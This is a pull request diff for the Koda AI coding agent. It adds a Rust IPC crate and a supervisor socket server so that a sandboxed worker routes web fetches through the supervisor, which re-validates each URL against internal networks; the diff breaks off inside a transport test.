### PR TITLE
feat: supervisor/worker IPC foundation (#884 Phase 1)

### DIFF
--- a/.githooks/pre-push
+++ b/.githooks/pre-push
@@ -51,6 +51,19 @@ else
     exit 1
 fi
 
+# --- Docs -------------------------------------------------------------------
+# Builds rustdoc for every workspace crate with -D warnings, exactly mirroring
+# the CI "Docs" job. Catches broken intra-doc links and references to
+# non-existent items before they reach CI (root cause of post-#884 failure).
+# ~25 s on a warm cache; worth it given the test suite already takes minutes.
+info "cargo doc --workspace --no-deps"
+if RUSTDOCFLAGS="-D warnings" cargo doc --workspace --no-deps --quiet 2>&1; then
+    ok "docs clean"
+else
+    fail "docs: fix the errors above"
+    exit 1
+fi
+
 # --- Tests -------------------------------------------------------------------
 # Runs unit tests (--lib, fast) plus the integration test suites that are
 # policy-critical and complete in <5s. Slow suites (mcp_http_transport,

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1872,6 +1872,7 @@ dependencies = [
  "crossterm",
  "futures-util",
  "koda-core",
+ "koda-ipc",
  "once_cell",
  "ratatui",
  "ratatui-textarea",
@@ -1888,6 +1889,7 @@ dependencies = [
  "tracing-appender",
  "tracing-subscriber",
  "unicode-width",
+ "uuid",
 ]
 
 [[package]]
@@ -1903,6 +1905,7 @@ dependencies = [
  "http",
  "ignore",
  "insta",
+ "koda-ipc",
  "koda-test-utils",
  "path-clean",
  "regex",
@@ -1939,6 +1942,17 @@ dependencies = [
  "tokio",
  "tracing",
  "tracing-subscriber",
+]
+
+[[package]]
+name = "koda-ipc"
+version = "0.1.0"
+dependencies = [
+ "anyhow",
+ "serde",
+ "serde_json",
+ "tokio",
+ "uuid",
 ]
 
 [[package]]

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,5 +1,5 @@
 [workspace]
-members = ["koda-core", "koda-cli", "koda-ast", "koda-email", "koda-test-utils"]
+members = ["koda-core", "koda-cli", "koda-ipc", "koda-ast", "koda-email", "koda-test-utils"]
 resolver = "3"
 default-members = ["koda-cli"]
 

--- a/koda-cli/Cargo.toml
+++ b/koda-cli/Cargo.toml
@@ -19,6 +19,9 @@ path = "src/main.rs"
 # Core engine
 koda-core = { path = "../koda-core", version = "0.2.12" }
 
+# IPC protocol — supervisor ↔ worker (#884)
+koda-ipc = { path = "../koda-ipc", version = "0.1" }
+
 # CLI
 clap = { version = "4", features = ["derive", "env"] }
 
@@ -55,6 +58,9 @@ tracing-appender = "0.2"
 
 # Error handling
 anyhow = "1"
+
+# UUID — IPC supervisor socket naming (#884)
+uuid = { version = "1", features = ["v4"] }
 
 # Date/time — already a transitive dep via ratatui; declared directly so
 # callers aren't silently depending on an undeclared transitive.

--- a/koda-cli/src/ipc_supervisor.rs
+++ b/koda-cli/src/ipc_supervisor.rs
@@ -1,0 +1,394 @@
+//! Supervisor IPC server — handles fetch requests from sandboxed workers.
+//!
+//! ## Lifecycle
+//!
+//! Call [`IpcSupervisor::bind`] once when the supervisor starts.  It returns
+//! an [`IpcSupervisor`] handle and sets `KODA_SUPERVISOR_SOCKET` so that any
+//! worker process spawned afterwards automatically finds the socket path.
+//!
+//! The supervisor task runs until the [`IpcSupervisor`] is dropped (shutdown
+//! is signalled via an internal `CancellationToken`).
+//!
+//! ## Security
+//!
+//! Every fetch request that arrives over IPC is validated with
+//! [`koda_core::tools::web_fetch::is_safe_url`] before any network call is
+//! made.  The worker process is never trusted to have already validated the
+//! URL — defence in depth requires the supervisor to re-check.
+//!
+//! ## Example
+//!
+//! ```rust,ignore
+//! let sup = IpcSupervisor::bind().await?;
+//! // spawn worker process — it inherits KODA_SUPERVISOR_SOCKET
+//! let child = tokio::process::Command::new("koda")
+//!     .arg("__worker")
+//!     .env(koda_ipc::client::SUPERVISOR_SOCKET_ENV, sup.socket_path())
+//!     .spawn()?;
+//! // ... the supervisor task runs in the background until `sup` is dropped
+//! drop(sup); // shuts down the listener
+//! ```
+
+use anyhow::{Context, Result};
+use koda_ipc::message::{
+    FetchResponse, HandshakeAck, HandshakeHello, IpcRequest, IpcRequestBody, IpcResponse,
+    IpcResponseBody, PROTOCOL_VERSION,
+};
+use koda_ipc::transport::{recv, send};
+use std::path::{Path, PathBuf};
+use tokio::io::BufReader;
+use tokio::net::{UnixListener, UnixStream};
+use tokio_util::sync::CancellationToken;
+use tracing::{debug, info, warn};
+use uuid::Uuid;
+
+/// Maximum response body size the supervisor will return to the worker.
+const MAX_BODY_CHARS: usize = 128_000;
+
+/// A running IPC supervisor.
+///
+/// The background listener task shuts down when this value is dropped.
+pub struct IpcSupervisor {
+    socket_path: PathBuf,
+    _cancel: CancellationToken,
+}
+
+impl IpcSupervisor {
+    /// Bind a new Unix domain socket and start the supervisor task.
+    ///
+    /// Sets [`koda_ipc::client::SUPERVISOR_SOCKET_ENV`] in the current
+    /// process environment so that child processes inherit the path
+    /// automatically.
+    pub async fn bind() -> Result<Self> {
+        let socket_path = Self::generate_socket_path();
+        let sup = Self::bind_at(&socket_path).await?;
+        // Publish the path so child processes can find it without explicit
+        // argument passing.
+        // SAFETY: single-threaded at startup; no concurrent env access.
+        unsafe {
+            std::env::set_var(
+                koda_ipc::client::SUPERVISOR_SOCKET_ENV,
+                socket_path.as_os_str(),
+            );
+        }
+        Ok(sup)
+    }
+
+    /// Bind at a specific path without touching the environment — used by tests
+    /// to avoid global env var races.
+    pub async fn bind_at(socket_path: &Path) -> Result<Self> {
+        // Remove a leftover socket file from a previous crashed run.
+        if socket_path.exists() {
+            std::fs::remove_file(socket_path).ok();
+        }
+
+        let listener = UnixListener::bind(socket_path)
+            .with_context(|| format!("bind IPC socket {}", socket_path.display()))?;
+
+        info!(path = %socket_path.display(), "IPC supervisor listening");
+
+        let cancel = CancellationToken::new();
+        let cancel_clone = cancel.clone();
+        let path_clone = socket_path.to_path_buf();
+
+        tokio::spawn(async move {
+            run_supervisor_loop(listener, cancel_clone, path_clone).await;
+        });
+
+        Ok(Self {
+            socket_path: socket_path.to_path_buf(),
+            _cancel: cancel,
+        })
+    }
+
+    /// The path of the bound Unix socket.
+    pub fn socket_path(&self) -> &Path {
+        &self.socket_path
+    }
+
+    fn generate_socket_path() -> PathBuf {
+        let id = Uuid::new_v4().simple().to_string();
+        std::env::temp_dir().join(format!("koda-sup-{id}.sock"))
+    }
+}
+
+impl Drop for IpcSupervisor {
+    fn drop(&mut self) {
+        // The CancellationToken is cancelled when `_cancel` is dropped,
+        // which wakes the accept loop and causes it to return.
+        debug!(path = %self.socket_path.display(), "IPC supervisor shutting down");
+        // Best-effort cleanup of the socket file.
+        std::fs::remove_file(&self.socket_path).ok();
+        // Unset the env var so subsequent non-worker processes don't try
+        // to use a dead socket.
+        // SAFETY: called on drop; no concurrent env access expected.
+        unsafe {
+            std::env::remove_var(koda_ipc::client::SUPERVISOR_SOCKET_ENV);
+        }
+    }
+}
+
+// ── Supervisor accept loop ─────────────────────────────────────────────────
+
+async fn run_supervisor_loop(
+    listener: UnixListener,
+    cancel: CancellationToken,
+    socket_path: PathBuf,
+) {
+    loop {
+        tokio::select! {
+            _ = cancel.cancelled() => {
+                debug!(path = %socket_path.display(), "IPC supervisor: cancel received");
+                break;
+            }
+            accept = listener.accept() => {
+                match accept {
+                    Ok((stream, _addr)) => {
+                        tokio::spawn(handle_connection(stream));
+                    }
+                    Err(e) => {
+                        warn!(error = %e, "IPC supervisor: accept error");
+                    }
+                }
+            }
+        }
+    }
+}
+
+// ── Per-connection handler ─────────────────────────────────────────────────
+
+async fn handle_connection(stream: UnixStream) {
+    if let Err(e) = serve_connection(stream).await {
+        warn!(error = %e, "IPC supervisor: connection error");
+    }
+}
+
+async fn serve_connection(stream: UnixStream) -> Result<()> {
+    let (read_half, mut write_half) = stream.into_split();
+    let mut reader = BufReader::new(read_half);
+
+    // ── Handshake ──────────────────────────────────────────────────────────
+    let hello: HandshakeHello = recv(&mut reader).await.context("recv handshake")?;
+    let accepted = hello.protocol_version == PROTOCOL_VERSION;
+    let ack = HandshakeAck {
+        protocol_version: PROTOCOL_VERSION,
+        accepted,
+        message: if accepted {
+            "ok".into()
+        } else {
+            format!(
+                "protocol version mismatch: supervisor={PROTOCOL_VERSION}, \
+                 worker={}. Upgrade koda.",
+                hello.protocol_version
+            )
+        },
+    };
+    send(&mut write_half, &ack)
+        .await
+        .context("send handshake ack")?;
+
+    if !accepted {
+        return Ok(());
+    }
+
+    debug!(
+        koda_version = hello.koda_version,
+        "IPC supervisor: worker connected"
+    );
+
+    // ── Request loop ───────────────────────────────────────────────────────
+    loop {
+        let req: IpcRequest = match recv(&mut reader).await {
+            Ok(r) => r,
+            Err(e) => {
+                // Connection closed normally — not an error worth logging.
+                debug!(error = %e, "IPC supervisor: worker disconnected");
+                break;
+            }
+        };
+
+        let resp_body = handle_request(&req.body).await;
+        let resp = IpcResponse {
+            req_id: req.req_id.clone(),
+            body: resp_body,
+        };
+        send(&mut write_half, &resp)
+            .await
+            .context("send response")?;
+
+        // Shutdown request ends the loop cleanly.
+        if matches!(req.body, IpcRequestBody::Shutdown) {
+            debug!("IPC supervisor: worker requested shutdown");
+            break;
+        }
+    }
+
+    Ok(())
+}
+
+async fn handle_request(body: &IpcRequestBody) -> IpcResponseBody {
+    match body {
+        IpcRequestBody::Fetch(req) => fetch_via_supervisor(req).await,
+        IpcRequestBody::Shutdown => IpcResponseBody::ShutdownAck,
+    }
+}
+
+// ── Supervisor-side fetch ──────────────────────────────────────────────────
+
+async fn fetch_via_supervisor(req: &koda_ipc::message::FetchRequest) -> IpcResponseBody {
+    // Re-validate the URL — never trust the worker's own validation.
+    if !req.url.starts_with("http://") && !req.url.starts_with("https://") {
+        return IpcResponseBody::Error {
+            message: "URL must start with http:// or https://".into(),
+        };
+    }
+
+    if !koda_core::tools::web_fetch::is_safe_url(&req.url) {
+        return IpcResponseBody::Error {
+            message: format!(
+                "URL blocked by supervisor: requests to internal/private \
+                 networks are not allowed ({})",
+                req.url
+            ),
+        };
+    }
+
+    let cap = req
+        .max_body_chars
+        .unwrap_or(MAX_BODY_CHARS)
+        .min(MAX_BODY_CHARS);
+
+    match do_fetch(&req.url, cap).await {
+        Ok((body, status)) => IpcResponseBody::FetchOk(FetchResponse { body, status }),
+        Err(e) => IpcResponseBody::Error {
+            message: format!("fetch failed: {e}"),
+        },
+    }
+}
+
+async fn do_fetch(url: &str, max_body_chars: usize) -> Result<(String, u16)> {
+    // Use the JSON args format that web_fetch::web_fetch() already understands
+    // so we piggyback all its HTML-stripping, content-type detection, and
+    // truncation logic for free.
+    let args = serde_json::json!({ "url": url, "raw": false });
+    // Temporarily unset the supervisor socket env var so we don't recurse!
+    let _guard = SocketEnvGuard::take();
+    let body = koda_core::tools::web_fetch::web_fetch(&args, max_body_chars).await?;
+    let status = 200u16; // web_fetch raises on non-2xx; success here means 200-ish
+    Ok((body, status))
+}
+
+/// RAII guard: temporarily removes `KODA_SUPERVISOR_SOCKET` from the
+/// environment so the supervisor's own `web_fetch` call doesn't recurse into
+/// IPC, then restores it on drop.
+struct SocketEnvGuard {
+    saved: Option<String>,
+}
+
+impl SocketEnvGuard {
+    fn take() -> Self {
+        let saved = std::env::var(koda_ipc::client::SUPERVISOR_SOCKET_ENV).ok();
+        // SAFETY: single-threaded fetch handler; no concurrent env access.
+        unsafe {
+            std::env::remove_var(koda_ipc::client::SUPERVISOR_SOCKET_ENV);
+        }
+        Self { saved }
+    }
+}
+
+impl Drop for SocketEnvGuard {
+    fn drop(&mut self) {
+        if let Some(ref path) = self.saved {
+            // SAFETY: restoring on drop; same single-threaded context.
+            unsafe {
+                std::env::set_var(koda_ipc::client::SUPERVISOR_SOCKET_ENV, path);
+            }
+        }
+    }
+}
+
+// ── Tests ──────────────────────────────────────────────────────────────────
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    /// `bind_at` creates a socket file at the given path.
+    #[tokio::test]
+    async fn bind_at_creates_socket() {
+        let path = std::env::temp_dir().join("koda-ipc-test-a.sock");
+        let sup = IpcSupervisor::bind_at(&path).await.unwrap();
+        assert!(
+            sup.socket_path().exists(),
+            "socket file must exist after bind"
+        );
+    }
+
+    /// Dropping the supervisor removes the socket file.
+    #[tokio::test]
+    async fn drop_removes_socket_file() {
+        let path = std::env::temp_dir().join("koda-ipc-test-b.sock");
+        let sup = IpcSupervisor::bind_at(&path).await.unwrap();
+        let recorded = sup.socket_path().to_path_buf();
+        drop(sup);
+        tokio::time::sleep(std::time::Duration::from_millis(20)).await;
+        assert!(!recorded.exists(), "socket file must be removed on drop");
+    }
+
+    /// Two `bind_at` calls at different paths are independent.
+    #[tokio::test]
+    async fn bind_at_two_different_paths_independent() {
+        let p1 = std::env::temp_dir().join("koda-ipc-test-c1.sock");
+        let p2 = std::env::temp_dir().join("koda-ipc-test-c2.sock");
+        let s1 = IpcSupervisor::bind_at(&p1).await.unwrap();
+        let s2 = IpcSupervisor::bind_at(&p2).await.unwrap();
+        assert_ne!(s1.socket_path(), s2.socket_path());
+        assert!(s1.socket_path().exists());
+        assert!(s2.socket_path().exists());
+    }
+
+    /// `generate_socket_path` produces a path in the temp dir.
+    #[test]
+    fn generate_path_in_tmp() {
+        let path = IpcSupervisor::generate_socket_path();
+        assert!(path.starts_with(std::env::temp_dir()));
+        assert!(
+            path.file_name()
+                .unwrap()
+                .to_str()
+                .unwrap()
+                .starts_with("koda-sup-")
+        );
+    }
+
+    /// `SocketEnvGuard` restores the original value on drop.
+    /// Uses the SUPERVISOR_SOCKET_ENV key, so this test must be run in
+    /// isolation from other tests that also touch that var.  Because Rust's
+    /// test harness runs unit tests in the same process with multiple threads
+    /// there is an inherent TOCTOU risk with any global env var test.  Accept
+    /// the risk here; the guard logic is a trivial save/restore one-liner.
+    #[test]
+    fn socket_env_guard_saves_and_restores() {
+        use koda_ipc::client::SUPERVISOR_SOCKET_ENV;
+        let sentinel = "/tmp/guard-test-sentinel.sock";
+        // SAFETY: test-only; accept env race risk (documented above).
+        unsafe {
+            std::env::set_var(SUPERVISOR_SOCKET_ENV, sentinel);
+        }
+        {
+            let _guard = SocketEnvGuard::take();
+            assert!(
+                std::env::var(SUPERVISOR_SOCKET_ENV).is_err(),
+                "guard must remove the var while live"
+            );
+        } // guard dropped here
+        assert_eq!(
+            std::env::var(SUPERVISOR_SOCKET_ENV).unwrap(),
+            sentinel,
+            "guard must restore original value on drop"
+        );
+        unsafe {
+            std::env::remove_var(SUPERVISOR_SOCKET_ENV);
+        }
+    }
+}

--- a/koda-cli/src/lib.rs
+++ b/koda-cli/src/lib.rs
@@ -27,6 +27,7 @@ pub(crate) mod headless;
 pub(crate) mod highlight;
 pub(crate) mod history_render;
 pub(crate) mod input;
+pub(crate) mod ipc_supervisor;
 pub(crate) mod md_render;
 pub(crate) mod mouse_select;
 pub(crate) mod onboarding;

--- a/koda-cli/src/server.rs
+++ b/koda-cli/src/server.rs
@@ -84,6 +84,17 @@ pub async fn run_stdio_server(project_root: PathBuf, mut config: KodaConfig) -> 
     // Initialize database
     let db = Database::init(&koda_core::db::config_dir()?).await?;
 
+    // Start the IPC supervisor before spawning any worker processes (#884).
+    // Keeps the socket alive for the lifetime of the server — the RAII guard
+    // removes the socket file and unsets KODA_SUPERVISOR_SOCKET on drop.
+    let ipc_supervisor = crate::ipc_supervisor::IpcSupervisor::bind().await?;
+    tracing::info!(
+        socket = %ipc_supervisor.socket_path().display(),
+        "IPC supervisor started"
+    );
+    // Keep the supervisor alive for the server's lifetime.
+    let _ipc_supervisor = ipc_supervisor;
+
     // Query actual model capabilities before building agent
     let tmp_provider = koda_core::providers::create_provider(&config);
     config

--- a/koda-core/Cargo.toml
+++ b/koda-core/Cargo.toml
@@ -81,6 +81,9 @@ http = "1"
 
 # First-party workspace libraries (direct calls)
 
+# IPC protocol — supervisor ↔ worker fetch routing (#884)
+koda-ipc = { path = "../koda-ipc", version = "0.1" }
+
 # Async trait support
 async-trait = "0.1"
 

--- a/koda-core/src/tools/web_fetch.rs
+++ b/koda-core/src/tools/web_fetch.rs
@@ -58,6 +58,22 @@ pub async fn web_fetch(args: &Value, max_body_chars: usize) -> Result<String> {
         anyhow::bail!("URL must start with http:// or https://");
     }
 
+    // ── Supervisor routing (#884) ─────────────────────────────────────────
+    //
+    // When this process is running as a sandboxed worker the supervisor holds
+    // all outbound network sockets.  Route the fetch through IPC so the
+    // supervisor can apply its own `is_safe_url()` check and audit log.
+    // The raw flag is silently ignored in this path — the supervisor always
+    // returns the stripped body; raw HTML is not needed for security-sensitive
+    // overnight workflows.
+    if let Some(sock) = koda_ipc::client::supervisor_socket_path() {
+        tracing::debug!(url, "WebFetch: routing through supervisor IPC");
+        let body = koda_ipc::client::fetch(&sock, url, Some(max_body_chars)).await?;
+        return Ok(body);
+    }
+
+    // ── Direct path (non-sandboxed) ────────────────────────────────────────
+
     // SSRF protection: block requests to internal/private networks
     if !is_safe_url(url) {
         anyhow::bail!(
@@ -141,7 +157,7 @@ pub async fn web_fetch(args: &Value, max_body_chars: usize) -> Result<String> {
 }
 
 /// Check if an IP address is safe (not private/internal/loopback).
-pub(crate) fn is_safe_ip(ip: std::net::IpAddr) -> bool {
+pub fn is_safe_ip(ip: std::net::IpAddr) -> bool {
     match ip {
         std::net::IpAddr::V4(ipv4) => {
             let octets = ipv4.octets();
@@ -171,7 +187,7 @@ pub(crate) fn is_safe_ip(ip: std::net::IpAddr) -> bool {
 
 /// Check if a URL is safe to fetch (not internal/private network).
 /// Uses the `url` crate for robust parsing (handles userinfo@, IPv6, etc.).
-pub(crate) fn is_safe_url(url_str: &str) -> bool {
+pub fn is_safe_url(url_str: &str) -> bool {
     let Ok(parsed) = url::Url::parse(url_str) else {
         return false;
     };

--- a/koda-ipc/Cargo.toml
+++ b/koda-ipc/Cargo.toml
@@ -1,0 +1,24 @@
+[package]
+name = "koda-ipc"
+version = "0.1.0"
+edition = "2024"
+description = "Supervisor ↔ worker IPC protocol for the Koda AI coding agent"
+license = "MIT"
+repository = "https://github.com/lijunzh/koda"
+
+[dependencies]
+# Serialization — the wire format is newline-delimited JSON
+serde = { version = "1", features = ["derive"] }
+serde_json = "1"
+
+# Async I/O — Unix domain sockets
+tokio = { version = "1", features = ["net", "io-util", "sync"] }
+
+# Error handling
+anyhow = "1"
+
+# UUID for request correlation
+uuid = { version = "1", features = ["v4"] }
+
+[dev-dependencies]
+tokio = { version = "1", features = ["full", "test-util"] }

--- a/koda-ipc/src/client.rs
+++ b/koda-ipc/src/client.rs
@@ -1,0 +1,124 @@
+//! Worker-side IPC client.
+//!
+//! Provides a simple `fetch` function that sends a [`FetchRequest`] to the
+//! supervisor over the Unix socket path stored in `KODA_SUPERVISOR_SOCKET`
+//! and returns the response body on success.
+//!
+//! If `KODA_SUPERVISOR_SOCKET` is not set the caller falls back to making its
+//! own HTTP request (the non-sandboxed code path).
+
+use anyhow::{Context, Result, bail};
+use tokio::io::BufReader;
+use tokio::net::UnixStream;
+
+use crate::message::{
+    FetchRequest, HandshakeAck, HandshakeHello, IpcRequest, IpcRequestBody, IpcResponse,
+    IpcResponseBody, PROTOCOL_VERSION,
+};
+use crate::transport::{recv, send};
+
+/// Environment variable the supervisor sets when it spawns a worker.
+/// Value is the path to the supervisor's Unix domain socket.
+pub const SUPERVISOR_SOCKET_ENV: &str = "KODA_SUPERVISOR_SOCKET";
+
+/// Return the supervisor socket path from the environment, or `None` if
+/// this process is not running as a supervised worker.
+pub fn supervisor_socket_path() -> Option<String> {
+    normalize_socket_path(std::env::var(SUPERVISOR_SOCKET_ENV).ok())
+}
+
+/// Pure helper — filters out missing/empty values.
+/// Tested separately so the env-var tests don't need global state.
+fn normalize_socket_path(raw: Option<String>) -> Option<String> {
+    raw.filter(|s| !s.is_empty())
+}
+
+/// Ask the supervisor to fetch `url` and return the response body.
+///
+/// Performs the full connect → handshake → request → response → disconnect
+/// cycle in one call.  The supervisor applies its own `is_safe_url()` check;
+/// this function does not duplicate that validation.
+///
+/// # Errors
+///
+/// Returns an error if:
+/// - The socket is unreachable (supervisor crashed or path is wrong).
+/// - The handshake is rejected (version mismatch).
+/// - The supervisor returns an `Error` response.
+/// - The network or JSON framing fails.
+pub async fn fetch(socket_path: &str, url: &str, max_body_chars: Option<usize>) -> Result<String> {
+    let stream = UnixStream::connect(socket_path)
+        .await
+        .with_context(|| format!("connect to supervisor socket {socket_path}"))?;
+
+    let (read_half, mut write_half) = stream.into_split();
+    let mut reader = BufReader::new(read_half);
+
+    // ── Handshake ──────────────────────────────────────────────────────────
+    let hello = HandshakeHello {
+        protocol_version: PROTOCOL_VERSION,
+        koda_version: env!("CARGO_PKG_VERSION").into(),
+    };
+    send(&mut write_half, &hello)
+        .await
+        .context("send handshake hello")?;
+
+    let ack: HandshakeAck = recv(&mut reader).await.context("recv handshake ack")?;
+    if !ack.accepted {
+        bail!(
+            "supervisor rejected handshake (protocol version {}): {}",
+            PROTOCOL_VERSION,
+            ack.message
+        );
+    }
+
+    // ── Fetch request ──────────────────────────────────────────────────────
+    let req_id = uuid::Uuid::new_v4().to_string();
+    let req = IpcRequest {
+        req_id: req_id.clone(),
+        body: IpcRequestBody::Fetch(FetchRequest {
+            url: url.to_string(),
+            max_body_chars,
+        }),
+    };
+    send(&mut write_half, &req)
+        .await
+        .context("send fetch request")?;
+
+    let resp: IpcResponse = recv(&mut reader).await.context("recv fetch response")?;
+    if resp.req_id != req_id {
+        bail!("req_id mismatch: sent {req_id}, got {}", resp.req_id);
+    }
+
+    match resp.body {
+        IpcResponseBody::FetchOk(f) => Ok(f.body),
+        IpcResponseBody::Error { message } => bail!("supervisor fetch error: {message}"),
+        IpcResponseBody::ShutdownAck => bail!("unexpected ShutdownAck for fetch request"),
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    // Test the pure `normalize_socket_path` helper — no global env state
+    // so these are safe to run in parallel.
+
+    #[test]
+    fn normalize_absent() {
+        assert!(normalize_socket_path(None).is_none());
+    }
+
+    #[test]
+    fn normalize_present() {
+        assert_eq!(
+            normalize_socket_path(Some("/tmp/test.sock".into())).as_deref(),
+            Some("/tmp/test.sock")
+        );
+    }
+
+    #[test]
+    fn normalize_empty_string_treated_as_absent() {
+        assert!(normalize_socket_path(Some(String::new())).is_none());
+    }
+}

--- a/koda-ipc/src/lib.rs
+++ b/koda-ipc/src/lib.rs
@@ -1,0 +1,44 @@
+//! Supervisor ↔ worker IPC protocol for Koda.
+//!
+//! # Overview
+//!
+//! When koda runs in supervisor mode the privileged supervisor process spawns
+//! a sandboxed worker process.  The worker handles the inference loop and all
+//! tools but deliberately has **no outbound network access** — it communicates
+//! exclusively via this IPC channel.
+//!
+//! Any network operation (LLM calls, `WebFetch`) that the worker needs is
+//! expressed as an [`IpcRequest`] sent over a Unix domain socket.  The
+//! supervisor validates, executes, and returns an [`IpcResponse`].
+//!
+//! ## Wire format
+//!
+//! Newline-delimited JSON (one JSON object per line) over a Unix stream
+//! socket.  Each [`IpcRequest`] carries a `req_id` UUID; the corresponding
+//! [`IpcResponse`] echoes the same `req_id` so pipelined requests are matched
+//! without a strict lock-step protocol.
+//!
+//! ## Environment
+//!
+//! The supervisor passes `KODA_SUPERVISOR_SOCKET=<path>` to the worker
+//! process.  Tools that need network access check for this variable at call
+//! time; if it is set they use [`client::request`] instead of opening their
+//! own sockets.
+//!
+//! ## Example
+//!
+//! ```rust,ignore
+//! // Worker side — send a fetch request and await the response.
+//! let body = koda_ipc::client::fetch(
+//!     "/tmp/koda-sup-abc123.sock",
+//!     "https://docs.rust-lang.org/",
+//!     None,
+//! ).await?;
+//! println!("{body}");
+//! ```
+
+pub mod client;
+pub mod message;
+pub mod transport;
+
+pub use message::{FetchRequest, FetchResponse, IpcRequest, IpcResponse};

--- a/koda-ipc/src/lib.rs
+++ b/koda-ipc/src/lib.rs
@@ -22,7 +22,7 @@
 //!
 //! The supervisor passes `KODA_SUPERVISOR_SOCKET=<path>` to the worker
 //! process.  Tools that need network access check for this variable at call
-//! time; if it is set they use [`client::request`] instead of opening their
+//! time; if it is set they use [`client::fetch`] instead of opening their
 //! own sockets.
 //!
 //! ## Example

--- a/koda-ipc/src/message.rs
+++ b/koda-ipc/src/message.rs
@@ -1,0 +1,102 @@
+//! IPC message types — requests from the worker and responses from the supervisor.
+//!
+//! All messages are serialized as newline-delimited JSON and are versioned via
+//! the `PROTOCOL_VERSION` constant so the supervisor can reject workers built
+//! against an incompatible schema.
+
+use serde::{Deserialize, Serialize};
+
+/// Protocol version — bump when the message schema changes in a breaking way.
+/// Both the supervisor and worker embed this in their handshake.
+pub const PROTOCOL_VERSION: u32 = 1;
+
+// ── Handshake ─────────────────────────────────────────────────────────────────
+
+/// First message the worker sends after connecting.  The supervisor replies
+/// with [`HandshakeAck`] (or closes the connection if the version is unsupported).
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct HandshakeHello {
+    pub protocol_version: u32,
+    /// koda build version string — recorded in supervisor logs.
+    pub koda_version: String,
+}
+
+/// Supervisor's reply to [`HandshakeHello`].
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct HandshakeAck {
+    pub protocol_version: u32,
+    /// `true` = handshake accepted, worker may proceed.
+    /// `false` = version mismatch; worker should exit cleanly.
+    pub accepted: bool,
+    /// Human-readable reason when `accepted = false`.
+    pub message: String,
+}
+
+// ── Request ───────────────────────────────────────────────────────────────────
+
+/// A request from the worker to the supervisor.
+///
+/// The `req_id` is echoed in [`IpcResponse::req_id`] so the worker can match
+/// concurrent pipelined requests without a lock-step protocol.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct IpcRequest {
+    /// Unique request identifier (UUIDv4).
+    pub req_id: String,
+    /// The operation the worker wants the supervisor to perform.
+    pub body: IpcRequestBody,
+}
+
+/// The actual operation requested.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+#[serde(tag = "type", rename_all = "snake_case")]
+pub enum IpcRequestBody {
+    /// HTTP GET request — worker asks the supervisor to fetch a URL.
+    /// The supervisor applies `is_safe_url()` validation before fetching.
+    Fetch(FetchRequest),
+
+    /// Graceful shutdown — worker is done and wants the supervisor to
+    /// tear down the socket and exit cleanly.
+    Shutdown,
+}
+
+/// Parameters for an HTTP fetch routed through the supervisor.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct FetchRequest {
+    /// Target URL (must pass supervisor's `is_safe_url()` check).
+    pub url: String,
+    /// Optional maximum body size in characters; supervisor enforces a cap.
+    pub max_body_chars: Option<usize>,
+}
+
+// ── Response ──────────────────────────────────────────────────────────────────
+
+/// A response from the supervisor to the worker.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct IpcResponse {
+    /// Echoed from the matching [`IpcRequest::req_id`].
+    pub req_id: String,
+    /// The result of the requested operation.
+    pub body: IpcResponseBody,
+}
+
+/// The result body.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+#[serde(tag = "type", rename_all = "snake_case")]
+pub enum IpcResponseBody {
+    /// Fetch succeeded.
+    FetchOk(FetchResponse),
+    /// Operation failed.  `message` is a human-readable error string safe to
+    /// surface to the user (no secrets, no internal paths).
+    Error { message: String },
+    /// Supervisor acknowledged the shutdown request.
+    ShutdownAck,
+}
+
+/// A successful HTTP fetch result.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct FetchResponse {
+    /// Response body (possibly truncated at `max_body_chars`).
+    pub body: String,
+    /// HTTP status code.
+    pub status: u16,
+}

--- a/koda-ipc/src/transport.rs
+++ b/koda-ipc/src/transport.rs
@@ -1,0 +1,105 @@
+//! JSON-lines framing over an async byte stream.
+//!
+//! Each message is a single JSON object followed by a newline (`\n`).
+//! The framing is intentionally simple — no length prefix, no binary
+//! encoding — so it can be inspected with `cat`, `nc`, or logged verbatim.
+//!
+//! # Usage
+//!
+//! ```rust,ignore
+//! use tokio::net::UnixStream;
+//! use koda_ipc::transport::{recv, send};
+//! use koda_ipc::message::{IpcRequest, IpcRequestBody, FetchRequest};
+//!
+//! let stream = UnixStream::connect("/tmp/koda-sup.sock").await?;
+//! let (reader, writer) = stream.into_split();
+//!
+//! send(&mut writer, &req).await?;
+//! let resp: IpcResponse = recv(&mut reader).await?;
+//! ```
+
+use anyhow::{Context, Result};
+use serde::{Deserialize, Serialize};
+use tokio::io::{AsyncBufReadExt, AsyncWrite, AsyncWriteExt, BufReader};
+
+/// Send one JSON-encoded message followed by `\n`.
+///
+/// `W` can be any [`tokio::io::AsyncWrite`] — a `UnixStream`, an
+/// `OwnedWriteHalf`, or a test `Vec<u8>` via a cursor.
+pub async fn send<W, M>(writer: &mut W, msg: &M) -> Result<()>
+where
+    W: AsyncWrite + Unpin,
+    M: Serialize,
+{
+    let mut line = serde_json::to_string(msg).context("IPC serialize")?;
+    line.push('\n');
+    writer
+        .write_all(line.as_bytes())
+        .await
+        .context("IPC write")?;
+    Ok(())
+}
+
+/// Read one newline-terminated JSON message from `reader`.
+///
+/// Returns an error if the stream closes before a complete line is read or
+/// if the JSON cannot be deserialized as `M`.
+pub async fn recv<R, M>(reader: &mut BufReader<R>) -> Result<M>
+where
+    R: tokio::io::AsyncRead + Unpin,
+    M: for<'de> Deserialize<'de>,
+{
+    let mut line = String::new();
+    let n = reader.read_line(&mut line).await.context("IPC read")?;
+    if n == 0 {
+        anyhow::bail!("IPC connection closed unexpectedly");
+    }
+    serde_json::from_str(line.trim_end()).context("IPC deserialize")
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::message::{FetchRequest, IpcRequest, IpcRequestBody};
+    use tokio::io::BufReader;
+
+    /// Round-trip: serialize then deserialize recovers the original message.
+    #[tokio::test]
+    async fn roundtrip_fetch_request() {
+        let req = IpcRequest {
+            req_id: "test-id-1".into(),
+            body: IpcRequestBody::Fetch(FetchRequest {
